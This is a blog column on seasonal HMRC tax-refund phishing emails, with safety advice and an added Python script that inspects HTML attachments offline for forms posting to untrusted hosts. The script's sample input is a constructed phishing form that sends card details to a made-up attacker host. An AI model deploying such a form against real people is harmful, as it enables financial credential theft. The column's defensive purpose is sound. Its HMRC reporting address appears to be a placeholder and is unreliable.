The IT Guy plays host to many thoughts, opinions, and debate on the subject of the technology world at large, from discussing emerging trends to dramatic changes in IT strategy and even the occasional piece of advice.
The eternal phishing alert
Phishers never sleep. Just as normal site traffic increases leading up to Self Assessment deadline day and at other cyclical times in the tax calendar, our spam filters regularly pick up seasonal surges in phishy-smelling messages supposedly coming from HMRC.
In the past week, a lot of the messages have been headed “Notice of Tax Return for Year 2011” and promise refunds of £209.87. They’ve got the HMRC logo and a telltale attachment “Tax Return Form.htm” that recipients are urged to fill in to claim their cash windfall.
Instead of the signature of HMRC officer John Cook, the message might as well have been signed by an officer of the Intercontinental Bank of Lagos, so obvious is its malicious intent. If you do open one of these emails, or similar phishing attempts, hover your mouse pointer over any link (or the attachment) and look at the address to which it's pointing. If it comes up with a dodgy domain name, do not click on it.
If you get an email requesting any kind of personal or business information, take one or more of the following steps:
• Ignore the message
• Delete the message
• Do not click on any links in the message
• Do not click on any attachments that accompany the message
• Do not reply to the e-mail
• Contact the sender via their own website or public telephone number (NOT anything listed in the email message) if you want to check they really did send it
• If the message claims to come from HMRC, report it by forwarding it to HMRC at firstname.lastname@example.org, then delete it.
According to Bitdefender, the tax rebate scam message is a clever one. Not only does it exploit the rather sizable number of genuine rebates that started going out last week (reportedly 3m, thanks to the unravelling of the PAYE code backlog), but the attachment form doesn't direct users to a dodgy website: it is saved to their PC and opened in their local browser as a local file, so the URL-reputation checks that would normally block a known phishing site never get a chance to fire. The form itself still sends whatever is typed into it to the phisher's server.
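The safe way to find out where such an attachment "points" is to inspect it without opening it in a browser. The following script is an added example, not code from the original column, Bitdefender or HMRC: it parses a saved .htm attachment, lists the hosts its forms submit to and its links lead to, and flags anything outside the HMRC/gov.uk domains (the trusted-suffix list and the sample attachment are constructed for illustration; refund-processing.example.net is a made-up phisher host).

```python
"""Inspect an HTML e-mail attachment offline: where do its forms post and its
links point? Added example; the sample attachment below is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts we would accept for a genuine HMRC form (assumption for this example).
TRUSTED_SUFFIXES = ("hmrc.gov.uk", "gov.uk")

# Input names that suggest the form is harvesting financial credentials.
SENSITIVE_FIELDS = ("card", "cvv", "sort", "account", "pin", "password", "passcode")


class TargetExtractor(HTMLParser):
    """Collect <form action> URLs, <a href> URLs and <input name>s from the HTML."""

    def __init__(self):
        super().__init__()
        self.forms, self.links, self.inputs = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.forms.append(a["action"])
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "input" and a.get("name"):
            self.inputs.append(a["name"].lower())


def host_of(url):
    """Lower-case hostname of an absolute http(s) URL, '' for anything else."""
    p = urlparse(url.strip())
    if p.scheme not in ("http", "https"):
        return ""
    return (p.hostname or "").lower()


def is_trusted(host):
    # Exact match or a real subdomain; "hmrc.gov.uk.evil.example" does not pass.
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def analyse_attachment(html):
    """Return the form/link hosts found and a verdict: 'ok' or 'suspicious'."""
    ex = TargetExtractor()
    ex.feed(html)
    form_hosts = sorted({host_of(u) for u in ex.forms} - {""})
    link_hosts = sorted({host_of(u) for u in ex.links} - {""})
    untrusted = sorted(h for h in set(form_hosts + link_hosts) if not is_trusted(h))
    sensitive = sorted(n for n in ex.inputs if any(k in n for k in SENSITIVE_FIELDS))
    # The giveaway is a form that posts to a host HMRC does not own: the page
    # renders locally, so no URL filter sees it, but the data still leaves the PC.
    suspicious = any(not is_trusted(h) for h in form_hosts)
    return {
        "form_hosts": form_hosts,
        "link_hosts": link_hosts,
        "untrusted_hosts": untrusted,
        "sensitive_fields": sensitive,
        "verdict": "suspicious" if suspicious else "ok",
    }


# Constructed sample modelled on the "Tax Return Form.htm" lure described above.
SAMPLE_ATTACHMENT = """<html><body>
<img src="https://www.hmrc.gov.uk/images/logo.png">
<h2>Notice of Tax Return for Year 2011</h2>
<p>You are due a refund of 209.87 GBP. Complete the form below to claim it.</p>
<form method="post" action="http://refund-processing.example.net/claim.php">
  Card number <input name="card_number"> Sort code <input name="sort_code">
  <input type="submit" value="Claim refund">
</form>
<a href="https://www.hmrc.gov.uk/">HM Revenue &amp; Customs</a>
</body></html>"""

if __name__ == "__main__":
    for k, v in analyse_attachment(SAMPLE_ATTACHMENT).items():
        print(f"{k}: {v}")
```

The decoy link to hmrc.gov.uk is what the victim sees if they hover; the form action, which is where the typed card details actually go, is only visible in the markup, which is why the script reports the two separately.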
All of the mainstream filtering services, including ours, are well tuned to these sorts of approaches, but for those who don’t have server-based protection, it’s a sad fact that even after all these years of education we still need to educate users not to be tempted to open attachments in emails from unexpected sources.
As we have seen with the recent phishing attempts purportedly from HMRC, not to mention AccountingWEB.co.uk and its sister site AccountingWEB.com, phishing attacks are getting more sophisticated and will often disguise themselves as coming from trusted sources.
With spam rates running at 95% of total emails sent, it has become a serious drain on resources. Filtering can cost thousands a year in software and updates alone, and the sheer volume of incoming mail requires extra hardware to process. For end-users, the downside of online communication is eternal vigilance, as the small percentage of plausible phishing messages that do get through can still cause serious damage.
Even AccountingWEB editor John Stokdyk, who claims to be technologically aware, has been caught out and confessed a year or so ago to being tricked by one of these “spoofed” messages.
There’s little more we, or HMRC can do other than continue to repeat the advice we have always given. Now, repeat after me: “I must not open dodgy email attachments. I must not open dodgy email attachments…”